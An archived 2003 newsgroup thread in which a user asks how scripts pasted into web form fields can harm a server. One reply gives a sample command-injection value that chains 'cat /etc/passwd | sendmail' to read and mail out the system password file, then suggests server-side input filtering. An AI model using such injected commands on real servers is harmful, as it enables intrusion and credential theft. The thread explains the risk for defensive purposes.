Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Programming > Javascript > hack script and forms

Reply
Thread Tools

hack script and forms

 
 
steve
Guest
Posts: n/a
 
      12-03-2003
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks


 
Reply With Quote
 
 
 
 
Brian
Guest
Posts: n/a
 
      12-03-2003

"steve" <(E-Mail Removed)> wrote in message
news:bqjil0$qqe$(E-Mail Removed)...
> Hi all
>
> what is it about that some one can paste script in the form field and
> submit the form and than what?
>
> can some one open my ice about that
> I like to know the bead and the good things about it
>
> Thanks
>
>


Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.


 
Reply With Quote
 
 
 
 
Lee
Guest
Posts: n/a
 
      12-03-2003
Brian said:
>
>
>"steve" <(E-Mail Removed)> wrote in message
>news:bqjil0$qqe$(E-Mail Removed)...
>> Hi all
>>
>> what is it about that some one can paste script in the form field and
>> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>

>
>Hmmmm... I am guessing that this is a poor translation, because I have no
>idea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".

 
Reply With Quote
 
Brian
Guest
Posts: n/a
 
      12-03-2003

"Lee" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Brian said:
> >
> >
> >"steve" <(E-Mail Removed)> wrote in message
> >news:bqjil0$qqe$(E-Mail Removed)...
> >> Hi all
> >>
> >> what is it about that some one can paste script in the form field and
> >> submit the form and than what?
> >>
> >> can some one open my ice about that
> >> I like to know the bead and the good things about it
> >>
> >> Thanks
> >>
> >>

> >
> >Hmmmm... I am guessing that this is a poor translation, because I have no
> >idea what you are asking... sorry.

>
> I think he was trying to be clever.
> open my ice = "open my eyes".
>


Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian


 
Reply With Quote
 
Lee
Guest
Posts: n/a
 
      12-03-2003
Brian said:
>
>
>"Lee" <(E-Mail Removed)> wrote in message
>news:(E-Mail Removed)...
>> Brian said:
>> >
>> >
>> >"steve" <(E-Mail Removed)> wrote in message
>> >news:bqjil0$qqe$(E-Mail Removed)...
>> >> Hi all
>> >>
>> >> what is it about that some one can paste script in the form field and
>> >> submit the form and than what?
>> >>
>> >> can some one open my ice about that
>> >> I like to know the bead and the good things about it
>> >>
>> >> Thanks
>> >>
>> >>
>> >
>> >Hmmmm... I am guessing that this is a poor translation, because I have no
>> >idea what you are asking... sorry.

>>
>> I think he was trying to be clever.
>> open my ice = "open my eyes".
>>

>
>Yeah, I read it that way... I still dont know what he is asking, and it is
>likely the case for the other readers of this group.


Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

 
Reply With Quote
 
620
Guest
Posts: n/a
 
      12-03-2003

"Brian" <(E-Mail Removed)> wrote in message
news:3fce1be9$1@10.10.0.241...
>
> "Lee" <(E-Mail Removed)> wrote in message
> news:(E-Mail Removed)...
> > Brian said:
> > >
> > >
> > >"steve" <(E-Mail Removed)> wrote in message
> > >news:bqjil0$qqe$(E-Mail Removed)...
> > >> Hi all
> > >>
> > >> what is it about that some one can paste script in the form field

and
> > >> submit the form and than what?
> > >>
> > >> can some one open my ice about that
> > >> I like to know the bead and the good things about it
> > >>
> > >> Thanks
> > >>
> > >>
> > >
> > >Hmmmm... I am guessing that this is a poor translation, because I have

no
> > >idea what you are asking... sorry.

> >
> > I think he was trying to be clever.
> > open my ice = "open my eyes".
> >

>
> Yeah, I read it that way... I still dont know what he is asking, and it is
> likely the case for the other readers of this group.
>
> Brian
>
>


....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Deliquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open eye
into the charred socket. This creates the Visionary Staff of Deliquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.


 
Reply With Quote
 
Brian
Guest
Posts: n/a
 
      12-03-2003

"Lee" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Brian said:
> >
> >
> >"Lee" <(E-Mail Removed)> wrote in message
> >news:(E-Mail Removed)...
> >> Brian said:
> >> >
> >> >
> >> >"steve" <(E-Mail Removed)> wrote in message
> >> >news:bqjil0$qqe$(E-Mail Removed)...
> >> >> Hi all
> >> >>
> >> >> what is it about that some one can paste script in the form field

and
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because I have

no
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>

> >
> >Yeah, I read it that way... I still dont know what he is asking, and it

is
> >likely the case for the other readers of this group.

>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.
>


Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShellFunction " + formValue + " someParamater");

and the user enters : something ; cat /etc/passwd | sendmail
http://www.velocityreviews.com/forums/(E-Mail Removed);

That is a very simple example of making a mess, and finding all of the users
on the server

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B



 
Reply With Quote
 
steve
Guest
Posts: n/a
 
      12-03-2003
> >> >> Hi all
> >> >>
> >> >> what is it about that some one can paste script in the form

field and
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because

I have no
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>

> >
> >Yeah, I read it that way... I still dont know what he is asking,

and it is
> >likely the case for the other readers of this group.

>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.


Sorry about my English
I did not try to be clever, I just wont to know as Lee gas how does
that work and does it effect the server or the user computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts
and on the other hand
How can I use such script to harm somebody's computer or a server.

Thanks and I hope that you guys understand my English


 
Reply With Quote
 
Lee
Guest
Posts: n/a
 
      12-03-2003
steve said:

>Sorry about my English


Sorry about guessing incorrectly.

>I did not try to be clever, I just wont to know as Lee [guess] how does
>that work and does it effect the server or the user computer.


The server.

>For example I have a web page .html with a form in site using form to
>mail function.
>What script can some body use to harm me or the server.
>How can I protect myself from such scripts


If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.

 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
How to execute a script from another script and other script does notdo busy wait. Rajat Python 3 01-08-2010 02:05 PM
RE: How to execute a script from another script and other script doesnotdo busy wait. VYAS ASHISH M-NTB837 Python 2 01-07-2010 08:18 PM
script tag hack midito@gmail.com Javascript 1 03-07-2006 08:11 PM
forms authentication -- expired forms cookie vs. not provided forms cookie Eric ASP .Net Security 2 01-27-2006 10:09 PM
Want password hack for Matt's old calendar script Butch Perl Misc 5 02-18-2004 08:59 PM



Advertisments